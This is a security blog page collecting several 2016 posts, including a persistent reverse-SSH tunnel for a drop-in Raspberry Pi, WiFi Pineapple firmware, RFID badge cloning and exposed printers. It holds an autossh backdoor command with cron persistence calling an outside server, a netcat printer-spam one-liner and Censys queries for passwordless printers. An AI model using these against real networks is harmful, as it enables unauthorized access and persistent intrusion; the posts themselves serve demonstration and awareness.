Curiosity in Practice

Author: jgamblin

OSX System Information Script

Publish Date805 Views

This morning I needed someone who I was helping to provide me some basic information about their Macbook and realized while I knew how to get that information it wasnt all in one easy to digest place so I wrote sysinfo.sh to quickly gather that information:
Screen Shot 2016-04-29 at 9.29.52 AM
Here is the code:
https://gist.github.com/jgamblin/aa9a6eda5bce6797ab8394e0c47d3676
You will need to install iStats (gem install iStats) or comment out the lines 9, 10, 12 and 13 to get the script to run properly.

Explaining the difference between a threat, a vulnerability and a risk.

Publish Date893 Views

During a recent round of phone interviews while expanding my team at work I was amazed at how many security professionals have a hard time clearly answering the following question:
 “What’s the difference between a threat, a vulnerability and a risk?” 
I think being able to do so is a key to being a good security professional.   I really like to use this analogy to try to help explain these three concepts clearly:

25D3A47F00000578-0-image-a-72_1424353548514“Close the open door (vulnerability) to stop the bear (threat). If it got in we could get mauled (risk).”

Understanding and applying these three terms is the first step to being able to do great risk analysis and is the only way to effect change in most organizations.  The next step is writing risk statements.

But remember doing this exercise is as much for you as it is for who you are trying to secure.  It wouldn’t make much sense to use your limited cycles to protect yourself against bears in Dallas, Texas would it?

bear-areas-map

 

Persistent Reverse-SSH Tunnel on a RaspberryPi

Publish Date18102 Views

I have a couple of old Raspberry Pi’s 2 laying around and have been meaning to turn them into “Remote Access Terminals” to demonstrate what happens if you do not do effective egress filtering on your network. At a high level if an attacker can plug in one of these on your network and get internet access they own your network.
Here is a terrible diagram I put together using draw.io to explain:
Untitled Diagram
To set this up you will need the following:

There are plenty of guides on setting this up so I won’t spend time doing that here. Once you have that complete and are on the pi you can run the the following command:
autossh -M 65500 -o ServerAliveInterval=20 -R 2222:localhost:22 root@digitalocean

Autossh will use ports 65500 and 65501 to send echo data over and back between server and host and open an ssh session on the public server to local port 2222 that will tunnel back to the SSH port on the Pi.
Once that is done you can ssh into your public ssh server and run the following command:
ssh -p 2222 [email protected]

Congratulations you now have a host you can control from the internet on a private network (That you totally have permission to be plugged into, right?).
back-door
While this works if the pi is has any problems the tunnel will be gone so we will use a cron job to make sure that it is always up.  You can use the following crontab entry that checks if the tunnel is up every minute:
* * * * * pi /usr/bin/screen -S reverse-ssh-tunnel -d -m autossh -M 65500 -i /home/pi/.ssh/id_rsa -o "ServerAliveInterval 20" -o "ServerAliveCountMax 3" -R 2222:localhost:22 root@digitalocean
Reboot the Pi to test and you should be good to go.

NetAidKit on a GL-inet 6416

Publish Date1303 Views

I have been playing with the GL.inet hardware lately and stumbled upon this project called NetAidKit that is built on the $25 6416 platform that offers a purpose built TOR and VPN router.
After building the images using the instructions on their github page (here is the one I built if you trust me) all you have to do is upload it and reboot and you are in business:
Screen Shot 2016-04-19 at 6.15.51 PM
The TOR feature worked flawlessly:
Screen Shot 2016-04-19 at 7.09.00 PMScreen Shot 2016-04-19 at 7.09.47 PM
The VPN still needs a lot of work as it expects certificate based authentication and every VPN I use still uses username and password authentication so I was disappointed I didn’t get to try it out.
Screen Shot 2016-04-19 at 7.03.31 PM
Over all this is an amazing project with a great idea and lots of potential.  I will be carrying a netaidkit with me from now on even if it just to use with TOR.

Turning a $25 GL-AR150 into a $100 WifiPineapple

Publish Date11305 Views

My friend Steve Lord recently introduced me to ultra portable GL-inet routers.  I picked up the $25 GL-AR150 to hack around on.
One of the first things I noticed while reading through their blog was that the hardware was the same as the wifipineapple nano and someone had already ported the firmware to work on the AR150.
Updating the firmware is as simple as logging in and uploading this file. Once you do it is as simple as logging in and setting it up: Screen Shot 2016-04-11 at 5.20.31 PMHere is are a couple of good guides on how to configure it:
The WiFi Pineapple Mark V – Introduction and Setup
WiFi Nano Setup
I plan on using this to do some continual AP and client monitoring around my  house.
Screen Shot 2016-04-11 at 5.35.06 PM I have a few more projects on this platform that I will be posting about soon.

Shodan2Sheets

Publish Date9158 Views

After spending last night working on a Reverse DNS Function for Google Sheets I couldnt leave well enough alone and wrote Shodan2Sheets tonight using the shodan.io api.
Screen Shot 2016-04-04 at 9.49.25 PM
It provides a lot more information than the reverse lookup function and all you should have to do is copy your API key to C2 and then start filling in IP addresses in the A column.   You can download a copy here.

A Reverse DNS Function for Google Sheets.

Publish Date5607 Views

Often in my job I am given spreadsheets of IP addresses that look like this:
Screen Shot 2016-04-03 at 4.16.11 PM
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
One of the first things I always want to do is find if they have a FQDN.   Sadly Google keeps forgetting to build a reversedns function into sheets so with the help of a  HackerTarget API I hacked this together today:
Screen Shot 2016-04-04 at 6.45.21 AM
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
The configuration is pretty easy (although this took me way longer than I want to admit.)
The cells are setup like this:
A2: IP Address
B2: =“http://api.hackertarget.com/reversedns/?q=”&(A2)
C2: =IMPORTDATA(B2)
D2: =SPLIT(C2,” “)
E2: FQDN (Finally
Here is a link to the sheet so you can copy it and play with it. Hopefully this can help someone else out in the future as I know I have spent way too much time manually looking this information up.
Here is a gif of it in action:

Finding Weev-Able Printers.

Publish Date682 Views

This weekend the infamous hacker and troll Weev decided it would be hilarious if he printed fascist flyers  on open printers around the united states using this top secret APT string:
cat payload.ps |netcat -q 0 ipadreess 9100
A lot of Colleges and Universities seem to have a problem with this.   While I strongly disagree with the content that Weev printed I was interested in how many printers were “vulnerable”  to this attack.
Using Censys.io (my favorite internet host search tool) to search for the following string “location.country_code:US AND telnet AND HP Jetdirect” I found 15,237 printers in the US that are “weev-able”.

Screen Shot 2016-03-28 at 6.56.52 AM
While 15,237 printers on the public internet is ridculous searching for “location.country_code:US AND “HP JetDirect Password is not set”” displays 5,683 printers that have no passwords set at all.
This is so ridiculous this is the only way I know how to end this post:
giphy (1)

Please Scan My Towel

Publish Date2035 Views

My friend Scott pointed out the towels in most hotels now have RFID tags to help with inventory control:
Screen Shot 2016-03-01 at 10.21.06 AM
I also knew that my RSA Conference  badge would have an RFID tag in it so it could be scanned on the expo floor:
2016-03-01 09.47.14
Since I never leave home without my Proxmark3 in my assault pack it was time to get to work:
2016-03-01 09.48.25
What I found out next is something I wasn’t expecting that made this whole thing a lot more interesting.
Using the Proxmark I was able to tell the hotel towel and my RSA tag uses the same MIFARE Ultralight C  tags: 
Screen Shot 2016-03-01 at 10.08.41 AM
So from there I was able to clone my RSA pass to my hotel towel since the towel had a re-writeable tag.
I will be demoing the walkthrough of this at  First  in Amsterdam in April. 
So now I am at the point where you can scan my towel and get the same UID.  Which will allow me to have people scan my towel and get the same information they would have gotten off my badge.
Which allows me to quote one of my favorite lines from the Hitchhikers Guide.
towel
 
*No hotel towels have been permanently harmed and  will be returned to my room with the correct UID rewritten to them. 

Make Your iPhone “FBI Proof”

Publish Date673 Views

The FBI has recently sued Apple to make them unlock the iphone of the San Bernardino Shooter (Here is Apple’s response.).
The reason Apple needs help is because the phone has “Erase All Data After 10 Failed Passcode Attempts” turned on.   Without that feature the government would have just built this robot to brute force the password and this wouldnt have been an issue:
ku-xlarge
What this means for the general public is that we now know that the FBI can not bypass this setting so if you care about your privacy you should enable it.
Doing so is fairly easy:
Settings > Touch ID & Passcodes > Erase Data > Enable.
IMG_0407 IMG_0409 IMG_0410
While this is a “dangerous” setting getting the phone to actually erase the data is actually pretty hard.  You have to wait through the following timeouts so that your toddler (or a malicious jerk) will not accidently erase your phone:
Screen Shot 2016-02-17 at 9.04.10 AM
 
You get used to seeing this screen a lot:
2016-02-17 08.01.04
After the 10th attempt this happens:

 

Older Posts
Newer Posts

Site Footer